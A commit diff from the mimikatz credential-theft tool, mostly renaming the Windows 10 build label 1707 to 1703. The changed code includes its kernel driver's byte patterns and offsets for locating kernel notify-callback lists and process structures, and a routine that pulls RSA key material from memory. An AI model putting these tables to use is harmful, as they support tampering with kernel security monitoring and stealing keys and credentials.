[new] misc::easyntlmchall

[typo] Windows version 1707 -> 1703 [internal] kull_m_net_getComputerName [internal] _ReturnAddress()
jpluimers · Dec 3, 2017 · 5e712a3 · 5e712a3
1 parent 4188d55
commit 5e712a3
Show file tree

Hide file tree

Showing 19 changed files with 99 additions and 46 deletions.
diff --git a/inc/globals.h b/inc/globals.h
@@ -93,7 +93,8 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
 #define KULL_M_WIN_BUILD_10_1507		10240
 #define KULL_M_WIN_BUILD_10_1511		10586
 #define KULL_M_WIN_BUILD_10_1607		14393
-#define KULL_M_WIN_BUILD_10_1707		15063
+#define KULL_M_WIN_BUILD_10_1703		15063
+#define KULL_M_WIN_BUILD_10_1709		16299
 
 #define KULL_M_WIN_MIN_BUILD_XP		2500
 #define KULL_M_WIN_MIN_BUILD_2K3	3000

diff --git a/mimidrv/globals.h b/mimidrv/globals.h
@@ -37,7 +37,7 @@ typedef enum _KIWI_OS_INDEX {
 	KiwiOsIndex_10_1507	= 7,
 	KiwiOsIndex_10_1511	= 8,
 	KiwiOsIndex_10_1607	= 9,
-	KiwiOsIndex_10_1707	= 10,
+	KiwiOsIndex_10_1703	= 10,
 
 	KiwiOsIndex_MAX		= 11,
 } KIWI_OS_INDEX, *PKIWI_OS_INDEX;

diff --git a/mimidrv/kkll_m_filters.c b/mimidrv/kkll_m_filters.c
@@ -19,7 +19,7 @@ const ULONG MF_OffSetTable[KiwiOsIndex_MAX][MF_MAX] =
 /* 10_1507*/{0x004c, 0x000c, 0x0010, 0x0040},
 /* 10_1511*/{0x004c, 0x000c, 0x0010, 0x0040},
 /* 10_1607*/{0x004c, 0x000c, 0x0010, 0x0040},
-/* 10_1707*/{0x004c, 0x000c, 0x0010, 0x0040},
+/* 10_1703*/{0x004c, 0x000c, 0x0010, 0x0040},
 #else
 /* UNK	*/	{0},
 /* XP	*/	{0},
@@ -31,7 +31,7 @@ const ULONG MF_OffSetTable[KiwiOsIndex_MAX][MF_MAX] =
 /* 10_1507*/{0x0090, 0x0018, 0x0020, 0x0060},
 /* 10_1511*/{0x0090, 0x0018, 0x0020, 0x0060},
 /* 10_1607*/{0x0090, 0x0018, 0x0020, 0x0060},
-/* 10_1707*/{0x0090, 0x0018, 0x0020, 0x0060},
+/* 10_1703*/{0x0090, 0x0018, 0x0020, 0x0060},
 #endif
 };
 

diff --git a/mimidrv/kkll_m_notify.c b/mimidrv/kkll_m_notify.c
@@ -30,7 +30,7 @@ KKLL_M_MEMORY_GENERIC ThreadReferences[] = {
 	{KiwiOsIndex_10_1507,	{sizeof(PTRN_W10_Thread), PTRN_W10_Thread},				L"PsRemoveCreateThreadNotifyRoutine",	L"PsRemoveLoadImageNotifyRoutine",	{ -8, 64}},
 	{KiwiOsIndex_10_1511,	{sizeof(PTRN_W10_Thread), PTRN_W10_Thread},				L"PsRemoveCreateThreadNotifyRoutine",	L"PsRemoveLoadImageNotifyRoutine",	{ -8, 64}},
 	{KiwiOsIndex_10_1607,	{sizeof(PTRN_W10_Thread), PTRN_W10_Thread},				L"PsRemoveCreateThreadNotifyRoutine",	L"PsRemoveLoadImageNotifyRoutine",	{ -8, 64}},
-	{KiwiOsIndex_10_1707,	{sizeof(PTRN_W10_Thread), PTRN_W10_Thread},				L"PsRemoveCreateThreadNotifyRoutine",	L"PsRemoveLoadImageNotifyRoutine",	{ -8, 64}},
+	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_Thread), PTRN_W10_Thread},				L"PsRemoveCreateThreadNotifyRoutine",	L"PsRemoveLoadImageNotifyRoutine",	{ -8, 64}},
 };
 UCHAR PTRN_W23_Process[] =	{0x41, 0xbf, 0x08, 0x00, 0x00, 0x00, 0x49, 0x8b, 0xdf, 0x48, 0x8b, 0xce, 0xe8};
 UCHAR PTRN_WVI_Process[] =	{0x48, 0x89, 0x4c, 0x24, 0x40, 0x41, 0xbe, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0xc1, 0xe8};
@@ -40,7 +40,7 @@ UCHAR PTRN_W81_Process[] =	{0x48, 0x8d, 0x04, 0xc1, 0x48, 0x89, 0x45, 0x70, 0x48
 UCHAR PTRN_W10_1507_Process[] =	{0x8b, 0xc3, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0x49, 0x8d, 0x0c, 0xc7, 0xe8};
 UCHAR PTRN_W10_1511_Process[] =	{0x49, 0x8d, 0x0c, 0xff, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0xe8};
 UCHAR PTRN_W10_1607_Process[] = {0x49, 0x8d, 0x0c, 0xfc, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0xe8};
-UCHAR PTRN_W10_1707_Process[] = {0x49, 0x8d, 0x0c, 0xdc, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0xe8};
+UCHAR PTRN_W10_1703_Process[] = {0x49, 0x8d, 0x0c, 0xdc, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0xe8};
 KKLL_M_MEMORY_GENERIC ProcessReferences[] = {
 	{KiwiOsIndex_2K3,		{sizeof(PTRN_W23_Process), PTRN_W23_Process},			L"PsReferencePrimaryToken",				L"CcSetBcbOwnerPointer",			{ -4,  8}},
 	{KiwiOsIndex_VISTA,		{sizeof(PTRN_WVI_Process), PTRN_WVI_Process},			L"SeCreateAccessStateEx",				L"PsReferenceImpersonationToken",	{ -4, 64}},
@@ -50,7 +50,7 @@ KKLL_M_MEMORY_GENERIC ProcessReferences[] = {
 	{KiwiOsIndex_10_1507,	{sizeof(PTRN_W10_1507_Process), PTRN_W10_1507_Process},	L"PsSetCreateProcessNotifyRoutine",		L"KeRegisterProcessorChangeCallback",	{ -4, 64}},
 	{KiwiOsIndex_10_1511,	{sizeof(PTRN_W10_1511_Process), PTRN_W10_1511_Process},	L"PsSetCreateProcessNotifyRoutine",		L"KeRegisterProcessorChangeCallback",	{ -4, 64}},
 	{KiwiOsIndex_10_1607,	{sizeof(PTRN_W10_1607_Process), PTRN_W10_1607_Process},	L"PsSetCreateProcessNotifyRoutine",		L"KeRegisterProcessorChangeCallback",	{ -4, 64}},
-	{KiwiOsIndex_10_1707,	{sizeof(PTRN_W10_1707_Process), PTRN_W10_1707_Process},	L"PsSetCreateProcessNotifyRoutine",		L"KeRegisterProcessorChangeCallback",	{ -4, 64}},
+	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_1703_Process), PTRN_W10_1703_Process},	L"PsSetCreateProcessNotifyRoutine",		L"KeRegisterProcessorChangeCallback",	{ -4, 64}},
 };
 UCHAR PTRN_W23_Image[] =	{0x4c, 0x8b, 0xf1, 0x48, 0x89, 0x78, 0x20, 0x4d, 0x8b, 0xe0, 0x4c, 0x8b, 0xea, 0xbd, 0x08, 0x00, 0x00, 0x00};
 UCHAR PTRN_WVI_Image[] =	{0x4c, 0x8b, 0xf2, 0x41, 0x0f, 0xba, 0x6d, 0x00, 0x0a, 0x4c, 0x8b, 0xf9, 0x49, 0xc7, 0x00, 0x38, 0x00, 0x00, 0x00};
@@ -67,7 +67,7 @@ KKLL_M_MEMORY_GENERIC ImageReferences[] = {
 	{KiwiOsIndex_10_1507,	{sizeof(PTRN_W10_Image), PTRN_W10_Image},				L"PsSetLoadImageNotifyRoutine",			L"PsSetCreateProcessNotifyRoutine",	{ -4,  64}},
 	{KiwiOsIndex_10_1511,	{sizeof(PTRN_W10_Image), PTRN_W10_Image},				L"PsSetLoadImageNotifyRoutine",			L"PsSetCreateProcessNotifyRoutine",	{ -4,  64}},
 	{KiwiOsIndex_10_1607,	{sizeof(PTRN_W10_Image), PTRN_W10_Image},				L"PsSetLoadImageNotifyRoutine",			L"SeRegisterLogonSessionTerminatedRoutineEx",	{ -4,  64}},
-	{KiwiOsIndex_10_1707,	{sizeof(PTRN_W10_Image), PTRN_W10_Image},				L"PsSetLoadImageNotifyRoutine",			L"PsSetCreateProcessNotifyRoutine",	{ -4,  64}},
+	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_Image), PTRN_W10_Image},				L"PsSetLoadImageNotifyRoutine",			L"PsSetCreateProcessNotifyRoutine",	{ -4,  64}},
 };
 UCHAR PTRN_W23_Object[] =	{0x40, 0x32, 0xf6, 0x4c, 0x89, 0x7c, 0x24, 0x78, 0x45, 0x33, 0xff, 0x4d, 0x85, 0xe4};
 UCHAR PTRN_WVI_Object[] =	{0x41, 0x8a, 0xdf, 0x4c, 0x89, 0x7c, 0x24, 0x58, 0x4d, 0x3b, 0xe7, 0x88, 0x5c, 0x24, 0x66, 0x4c, 0x89, 0x7c, 0x24, 0x50, 0x49, 0x8b, 0xef, 0xc7, 0x44, 0x24, 0x68};
@@ -84,7 +84,7 @@ KKLL_M_MEMORY_GENERIC ObjectReferences[] = {
 	{KiwiOsIndex_10_1507,	{sizeof(PTRN_W10_Object), PTRN_W10_Object},				L"ObCreateObjectType",					L"RtlRunOnceInitialize",			{ 25, 0x010, 0x070, 0x0c8}},
 	{KiwiOsIndex_10_1511,	{sizeof(PTRN_W10_Object), PTRN_W10_Object},				L"ObCreateObjectType",					L"RtlRunOnceInitialize",			{ 25, 0x010, 0x070, 0x0c8}},
 	{KiwiOsIndex_10_1607,	{sizeof(PTRN_W10_Object), PTRN_W10_Object},				L"ObCreateObjectType",					L"KseRegisterShim",					{ 25, 0x010, 0x070, 0x0c8}},
-	{KiwiOsIndex_10_1707,	{sizeof(PTRN_W10_Object), PTRN_W10_Object},				L"ObCreateObjectType",					L"IoCreateDriver",					{ 25, 0x010, 0x070, 0x0c8}},
+	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_Object), PTRN_W10_Object},				L"ObCreateObjectType",					L"IoCreateDriver",					{ 25, 0x010, 0x070, 0x0c8}},
 };
 UCHAR PTRN_W23_Reg[] =	{0x49, 0x8d, 0x0c, 0xdc, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd7, 0xe8};
 UCHAR PTRN_WVI_Reg[] =	{0x48, 0x8b, 0xf0, 0x48, 0x89, 0x44, 0x24, 0x38, 0x48, 0x85, 0xc0, 0x0f, 0x84};
@@ -101,7 +101,7 @@ KKLL_M_MEMORY_GENERIC RegReferences[] = {
 	{KiwiOsIndex_10_1507,	{sizeof(PTRN_W10_Reg), PTRN_W10_Reg},					L"CmUnRegisterCallback",				L"FsRtlAllocateResource",			{ -9, 0x028}},
 	{KiwiOsIndex_10_1511,	{sizeof(PTRN_W10_Reg), PTRN_W10_Reg},					L"CmUnRegisterCallback",				L"FsRtlAllocateResource",			{ -9, 0x028}},
 	{KiwiOsIndex_10_1607,	{sizeof(PTRN_W10_Reg), PTRN_W10_Reg},					L"CmUnRegisterCallback",				L"FsRtlAllocateResource",			{ -9, 0x028}},
-	{KiwiOsIndex_10_1707,	{sizeof(PTRN_W10_Reg), PTRN_W10_Reg},					L"CmUnRegisterCallback",				L"DbgkLkmdUnregisterCallback",		{ -9, 0x028}},
+	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_Reg), PTRN_W10_Reg},					L"CmUnRegisterCallback",				L"DbgkLkmdUnregisterCallback",		{ -9, 0x028}},
 };
 #elif defined _M_IX86
 UCHAR PTRN_WXP_Thread[] =	{0xc7, 0x45, 0xa4, 0x08, 0x00, 0x00, 0x00, 0xff, 0x75, 0xbc, 0xe8};
@@ -121,7 +121,7 @@ KKLL_M_MEMORY_GENERIC ThreadReferences[] = {	// PspCreateThreadNotifyRoutine
 	{KiwiOsIndex_10_1507,	{sizeof(PTRN_W10_Thread), PTRN_W10_Thread},			L"PsSetCreateProcessNotifyRoutine",			L"PoRegisterCoalescingCallback",	{ -4, 64}},
 	{KiwiOsIndex_10_1511,	{sizeof(PTRN_W10_Thread), PTRN_W10_Thread},			L"PsSetCreateProcessNotifyRoutine",			L"PoRegisterCoalescingCallback",	{ -4, 64}},
 	{KiwiOsIndex_10_1607,	{sizeof(PTRN_W10_Thread), PTRN_W10_Thread},			L"PsSetCreateProcessNotifyRoutine",			L"PoRegisterCoalescingCallback",	{ -4, 64}},
-	{KiwiOsIndex_10_1707,	{sizeof(PTRN_W10_Thread), PTRN_W10_Thread},			L"PsSetCreateProcessNotifyRoutine",			L"PoRegisterCoalescingCallback",	{ -4, 64}},
+	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_Thread), PTRN_W10_Thread},			L"PsSetCreateProcessNotifyRoutine",			L"PoRegisterCoalescingCallback",	{ -4, 64}},
 };
 UCHAR PTRN_WXP_Process[] =	{0xc7, 0x45, 0xb0, 0x08, 0x00, 0x00, 0x00, 0xff, 0x75, 0xcc, 0xe8};
 UCHAR PTRN_W23_Process[] =	{0xc7, 0x45, 0xb0, 0x08, 0x00, 0x00, 0x00, 0xff, 0x75, 0xc8, 0xe8};
@@ -131,7 +131,7 @@ UCHAR PTRN_WI8_Process[] =	{0x83, 0xc0, 0x40, 0x89, 0x85, 0x58, 0xff, 0xff, 0xff
 UCHAR PTRN_W81_Process[] =	{0x89, 0x45, 0x9c, 0x83, 0x65, 0x8c, 0x00, 0x8b, 0xc8, 0xe8};
 UCHAR PTRN_W10_1507_Process[] =	{0x8b, 0xf7, 0x57, 0x8b, 0xd0, 0x8b, 0xcb, 0xe8};
 UCHAR PTRN_W10_1511_Process[] =	{0x33, 0xf6, 0x6a, 0x00, 0x8b, 0xd0, 0x8b, 0xcf, 0xe8};
-UCHAR PTRN_W10_1707_Process[] =	{0x33, 0xff, 0x6a, 0x00, 0x8b, 0xd0, 0x8b, 0xcb, 0xe8};
+UCHAR PTRN_W10_1703_Process[] =	{0x33, 0xff, 0x6a, 0x00, 0x8b, 0xd0, 0x8b, 0xcb, 0xe8};
 KKLL_M_MEMORY_GENERIC ProcessReferences[] = {	// PspCreateProcessNotifyRoutine
 	{KiwiOsIndex_XP,		{sizeof(PTRN_WXP_Process), PTRN_WXP_Process},		L"NtSetInformationProcess",					L"LdrEnumResources",				{ -4,  8}},
 	{KiwiOsIndex_2K3,		{sizeof(PTRN_W23_Process), PTRN_W23_Process},		L"NtSetInformationProcess",					L"LdrEnumResources",				{ -4,  8}},
@@ -142,7 +142,7 @@ KKLL_M_MEMORY_GENERIC ProcessReferences[] = {	// PspCreateProcessNotifyRoutine
 	{KiwiOsIndex_10_1507,	{sizeof(PTRN_W10_1507_Process), PTRN_W10_1507_Process},	L"PoRegisterCoalescingCallback",		L"RtlGenerateClass5Guid",			{ -4, 64}},
 	{KiwiOsIndex_10_1511,	{sizeof(PTRN_W10_1511_Process), PTRN_W10_1511_Process},	L"PoRegisterCoalescingCallback",		L"RtlGenerateClass5Guid",			{ -4, 64}},
 	{KiwiOsIndex_10_1607,	{sizeof(PTRN_W10_1511_Process), PTRN_W10_1511_Process},	L"PoRegisterCoalescingCallback",		L"PoRequestShutdownEvent",			{ -4, 64}},
-	{KiwiOsIndex_10_1707,	{sizeof(PTRN_W10_1707_Process), PTRN_W10_1707_Process},	L"PoRegisterCoalescingCallback",		L"PoRequestShutdownEvent",			{ -4, 64}},
+	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_1703_Process), PTRN_W10_1703_Process},	L"PoRegisterCoalescingCallback",		L"PoRequestShutdownEvent",			{ -4, 64}},
 };
 UCHAR PTRN_WXP_Image[] =	{0x53, 0x56, 0x57, 0x6a, 0x08, 0xbf};
 UCHAR PTRN_W23_Image[] =	{0x53, 0x56, 0x57, 0x6a, 0x08, 0xbf};
@@ -162,7 +162,7 @@ KKLL_M_MEMORY_GENERIC ImageReferences[] = {	// PspLoadImageNotifyRoutine
 	{KiwiOsIndex_10_1507,	{sizeof(PTRN_W10_1507_Image), PTRN_W10_1507_Image},	L"PsSetLoadImageNotifyRoutine",				L"RtlGenerateClass5Guid",			{ -4,  64}},
 	{KiwiOsIndex_10_1511,	{sizeof(PTRN_W10_1511_Image), PTRN_W10_1511_Image},	L"PsSetLoadImageNotifyRoutine",				L"RtlGenerateClass5Guid",			{ -4,  64}},
 	{KiwiOsIndex_10_1607,	{sizeof(PTRN_W10_1511_Image), PTRN_W10_1511_Image},	L"PsSetLoadImageNotifyRoutine",				L"PsSetCreateProcessNotifyRoutine",	{ -4,  64}},
-	{KiwiOsIndex_10_1707,	{sizeof(PTRN_W10_1511_Image), PTRN_W10_1511_Image},	L"PsSetLoadImageNotifyRoutine",				L"PsSetCreateProcessNotifyRoutine",	{ -4,  64}},
+	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_1511_Image), PTRN_W10_1511_Image},	L"PsSetLoadImageNotifyRoutine",				L"PsSetCreateProcessNotifyRoutine",	{ -4,  64}},
 };
 UCHAR PTRN_WXP_Object[] =	{0x3b, 0xfb, 0xc6, 0x45, 0xe6, 0x00, 0x89, 0x5d, 0xe0, 0x89, 0x5d, 0xdc, 0xc7, 0x45, 0xe8};
 UCHAR PTRN_W23_Object[] =	{0x3b, 0xfb, 0xc6, 0x45, 0xe6, 0x00, 0x89, 0x5d, 0xdc, 0x89, 0x5d, 0xd8, 0xc7, 0x45, 0xe8};
@@ -171,7 +171,7 @@ UCHAR PTRN_WI7_Object[] =	{0xc6, 0x44, 0x24, 0x22, 0x00, 0xc6, 0x44, 0x24, 0x23,
 UCHAR PTRN_WI8_Object[] =	{0x33, 0xc0, 0x8b, 0xf8, 0x66, 0x89, 0x44, 0x24, 0x2a, 0x89, 0x44, 0x24, 0x1c, 0x89, 0x7c, 0x24, 0x18, 0xc7, 0x44, 0x24, 0x2c};
 UCHAR PTRN_W81_Object[] =	{0x8d, 0x44, 0x24, 0x14, 0x50, 0x33, 0xc0, 0x89, 0x7c, 0x24, 0x18, 0x50, 0x6a, 0x40};
 UCHAR PTRN_W10_Object[] =	{0x66, 0x8b, 0x02, 0x49, 0x8d, 0x52, 0x02, 0x66, 0x83, 0xf8, 0x5c, 0x0f, 0x84};
-UCHAR PTRN_W10_1707_Object[] =	{0x0f, 0xb7, 0x07, 0x49, 0x03, 0xfa, 0x83, 0xf8, 0x5c, 0x0f, 0x84};
+UCHAR PTRN_W10_1703_Object[] =	{0x0f, 0xb7, 0x07, 0x49, 0x03, 0xfa, 0x83, 0xf8, 0x5c, 0x0f, 0x84};
 KKLL_M_MEMORY_GENERIC ObjectReferences[] = { // ObpTypeDirectoryObject
 	{KiwiOsIndex_XP,		{sizeof(PTRN_WXP_Object), PTRN_WXP_Object},			L"ObCreateObjectType",						L"NtOpenThread",					{ -4, 0x040, 0x08c}},
 	{KiwiOsIndex_2K3,		{sizeof(PTRN_W23_Object), PTRN_W23_Object},			L"ObCreateObjectType",						L"NtOpenThread",					{ -4, 0x040, 0x08c}},
@@ -182,7 +182,7 @@ KKLL_M_MEMORY_GENERIC ObjectReferences[] = { // ObpTypeDirectoryObject
 	{KiwiOsIndex_10_1507,	{sizeof(PTRN_W10_Object), PTRN_W10_Object},			L"ObCreateObjectType",						L"KseRegisterShim",					{ 23, 0x008, 0x058, 0x088}},
 	{KiwiOsIndex_10_1511,	{sizeof(PTRN_W10_Object), PTRN_W10_Object},			L"ObCreateObjectType",						L"KseRegisterShim",					{ 23, 0x008, 0x058, 0x088}},
 	{KiwiOsIndex_10_1607,	{sizeof(PTRN_W10_Object), PTRN_W10_Object},			L"ObCreateObjectType",						L"KseRegisterShim",					{ 23, 0x008, 0x058, 0x088}},
-	{KiwiOsIndex_10_1707,	{sizeof(PTRN_W10_1707_Object), PTRN_W10_1707_Object},	L"ObCreateObjectType",					L"KseRegisterShim",					{ 21, 0x008, 0x058, 0x088}},
+	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_1703_Object), PTRN_W10_1703_Object},	L"ObCreateObjectType",					L"KseRegisterShim",					{ 21, 0x008, 0x058, 0x088}},
 };
 UCHAR PTRN_WXP_Reg[] =	{0x89, 0x7d, 0x10, 0x57, 0xff, 0x75, 0xfc, 0xff, 0x75, 0x08, 0xe8};
 UCHAR PTRN_W23_Reg[] =	{0x89, 0x5d, 0x08, 0x53, 0xff, 0x75, 0xfc, 0x57, 0xe8};
@@ -191,7 +191,7 @@ UCHAR PTRN_WI7_Reg[] =	{0x8b, 0x03, 0x8b, 0x4b, 0x04, 0x3b, 0x46, 0x10, 0x75};
 UCHAR PTRN_WI8_Reg[] =	{0x53, 0x8d, 0x55, 0xd0, 0x8b, 0xce, 0xe8};
 UCHAR PTRN_W81_Reg[] =	{0x8b, 0x08, 0x8b, 0x40, 0x04, 0x3b, 0x4e, 0x10, 0x75};
 UCHAR PTRN_W10_Reg[] =	{0x8b, 0x4d, 0x0c, 0x8b, 0x01, 0x8b, 0x49, 0x04, 0x3b};
-UCHAR PTRN_W10_1707_Reg[] = {0x8b, 0x01, 0x8b, 0x49, 0x04, 0x3b, 0x46, 0x10, 0x75};
+UCHAR PTRN_W10_1703_Reg[] = {0x8b, 0x01, 0x8b, 0x49, 0x04, 0x3b, 0x46, 0x10, 0x75};
 KKLL_M_MEMORY_GENERIC RegReferences[] = { // CallbackListHead
 	{KiwiOsIndex_XP,		{sizeof(PTRN_WXP_Reg), PTRN_WXP_Reg},			L"CmRegisterCallback",							L"FsRtlMdlReadDev",					{ -4}},
 	{KiwiOsIndex_2K3,		{sizeof(PTRN_W23_Reg), PTRN_W23_Reg},			L"CmRegisterCallback",							L"FsRtlCopyRead",					{ -4}},
@@ -202,7 +202,7 @@ KKLL_M_MEMORY_GENERIC RegReferences[] = { // CallbackListHead
 	{KiwiOsIndex_10_1507,	{sizeof(PTRN_W10_Reg), PTRN_W10_Reg},			L"CmSetCallbackObjectContext",					L"CmUnRegisterCallback",			{ -8, 0x01c}},
 	{KiwiOsIndex_10_1511,	{sizeof(PTRN_W10_Reg), PTRN_W10_Reg},			L"CmSetCallbackObjectContext",					L"CmUnRegisterCallback",			{ -8, 0x01c}},
 	{KiwiOsIndex_10_1607,	{sizeof(PTRN_W10_Reg), PTRN_W10_Reg},			L"CmSetCallbackObjectContext",					L"CmUnRegisterCallback",			{ -8, 0x01c}},
-	{KiwiOsIndex_10_1707,	{sizeof(PTRN_W10_1707_Reg), PTRN_W10_1707_Reg},	L"CmSetCallbackObjectContext",					L"CmUnRegisterCallback",			{ -8, 0x01c}},
+	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_1703_Reg), PTRN_W10_1703_Reg},	L"CmSetCallbackObjectContext",					L"CmUnRegisterCallback",			{ -8, 0x01c}},
 };
 #endif
 

diff --git a/mimidrv/kkll_m_process.c b/mimidrv/kkll_m_process.c
@@ -18,7 +18,7 @@ const ULONG EPROCESS_OffSetTable[KiwiOsIndex_MAX][Eprocess_MAX] =
 /* 10_1507*/{0x00b8, 0x00c0, 0x0040, 0x02dc},
 /* 10_1511*/{0x00b8, 0x00c0, 0x0040, 0x02dc},
 /* 10_1607*/{0x00b8, 0x00c0, 0x0040, 0x02e4},
-/* 10_1707*/{0x00b8, 0x00c0, 0x0040, 0x02ec},
+/* 10_1703*/{0x00b8, 0x00c0, 0x0040, 0x02ec},
 #else
 /* UNK	*/	{0},
 /* XP	*/	{0},
@@ -30,7 +30,7 @@ const ULONG EPROCESS_OffSetTable[KiwiOsIndex_MAX][Eprocess_MAX] =
 /* 10_1507*/{0x02f0, 0x0300, 0x0040, 0x06a8},
 /* 10_1511*/{0x02f0, 0x0300, 0x0040, 0x06b0},
 /* 10_1607*/{0x02f0, 0x0300, 0x0040, 0x06c0},
-/* 10_1707*/{0x02e8, 0x0300, 0x0040, 0x06c8},
+/* 10_1703*/{0x02e8, 0x0300, 0x0040, 0x06c8},
 #endif
 };
 

diff --git a/mimidrv/mimidrv.c b/mimidrv/mimidrv.c
@@ -168,7 +168,7 @@ NTSTATUS MimiDispatchDeviceControl(IN OUT DEVICE_OBJECT *DeviceObject, IN OUT IR
 KIWI_OS_INDEX getWindowsIndex()
 {
 	if(*NtBuildNumber > 15063) // forever 10 =)
-		return KiwiOsIndex_10_1707;
+		return KiwiOsIndex_10_1703;
 
 	switch(*NtBuildNumber)
 	{
@@ -205,7 +205,7 @@ KIWI_OS_INDEX getWindowsIndex()
 			return KiwiOsIndex_10_1607;
 			break;
 		case 15063:
-			return KiwiOsIndex_10_1707;
+			return KiwiOsIndex_10_1703;
 			break;
 		default:
 			return KiwiOsIndex_UNK;

diff --git a/mimikatz/modules/crypto/kuhl_m_crypto_extractor.c b/mimikatz/modules/crypto/kuhl_m_crypto_extractor.c
@@ -386,7 +386,7 @@ void kuhl_m_crypto_extractor_bcrypt32(PKULL_M_MEMORY_ADDRESS address)
 									kuhl_m_crypto_extractor_bcrypt32_classic(address->hMemory, ((PKIWI_BCRYPT_ASYM_KEY_6_32) p)->bnPrime1.Prime, ((PKIWI_BCRYPT_ASYM_KEY_6_32) p)->bnPrime1.nbBlock * 4, L"Prime1    ");
 									kuhl_m_crypto_extractor_bcrypt32_classic(address->hMemory, ((PKIWI_BCRYPT_ASYM_KEY_6_32) p)->bnPrime2.Prime, ((PKIWI_BCRYPT_ASYM_KEY_6_32) p)->bnPrime2.nbBlock * 4, L"Prime2    ");
 								}
-								else if(MIMIKATZ_NT_BUILD_NUMBER < KULL_M_WIN_BUILD_10_1707)
+								else if(MIMIKATZ_NT_BUILD_NUMBER < KULL_M_WIN_BUILD_10_1703)
 								{
 									kuhl_m_crypto_extractor_bcrypt32_classic(address->hMemory, ((PKIWI_BCRYPT_ASYM_KEY_81_32) p)->PublicExponent, 1 * 4, L"PubExp    ");
 									kuhl_m_crypto_extractor_bcrypt32_classic(address->hMemory, ((PKIWI_BCRYPT_ASYM_KEY_81_32) p)->Modulus, ((PKIWI_BCRYPT_ASYM_KEY_81_32) p)->nbModulus * 4, L"Modulus   ");
@@ -569,7 +569,7 @@ void kuhl_m_crypto_extractor_bcrypt64(PKULL_M_MEMORY_ADDRESS address)
 									kuhl_m_crypto_extractor_bcrypt64_classic(address->hMemory, ((PKIWI_BCRYPT_ASYM_KEY_6_64) p)->bnPrime1.Prime, (DWORD) ((PKIWI_BCRYPT_ASYM_KEY_6_64) p)->bnPrime1.nbBlock * 8, L"Prime1    ");
 									kuhl_m_crypto_extractor_bcrypt64_classic(address->hMemory, ((PKIWI_BCRYPT_ASYM_KEY_6_64) p)->bnPrime2.Prime, (DWORD) ((PKIWI_BCRYPT_ASYM_KEY_6_64) p)->bnPrime2.nbBlock * 8, L"Prime2    ");
 								}
-								else if(MIMIKATZ_NT_BUILD_NUMBER < KULL_M_WIN_BUILD_10_1707)
+								else if(MIMIKATZ_NT_BUILD_NUMBER < KULL_M_WIN_BUILD_10_1703)
 								{
 									kuhl_m_crypto_extractor_bcrypt64_classic(address->hMemory, ((PKIWI_BCRYPT_ASYM_KEY_81_64) p)->PublicExponent, 1 * 8, L"PubExp    ");
 									kuhl_m_crypto_extractor_bcrypt64_classic(address->hMemory, ((PKIWI_BCRYPT_ASYM_KEY_81_64) p)->Modulus, ((PKIWI_BCRYPT_ASYM_KEY_81_64) p)->nbModulus * 8, L"Modulus   ");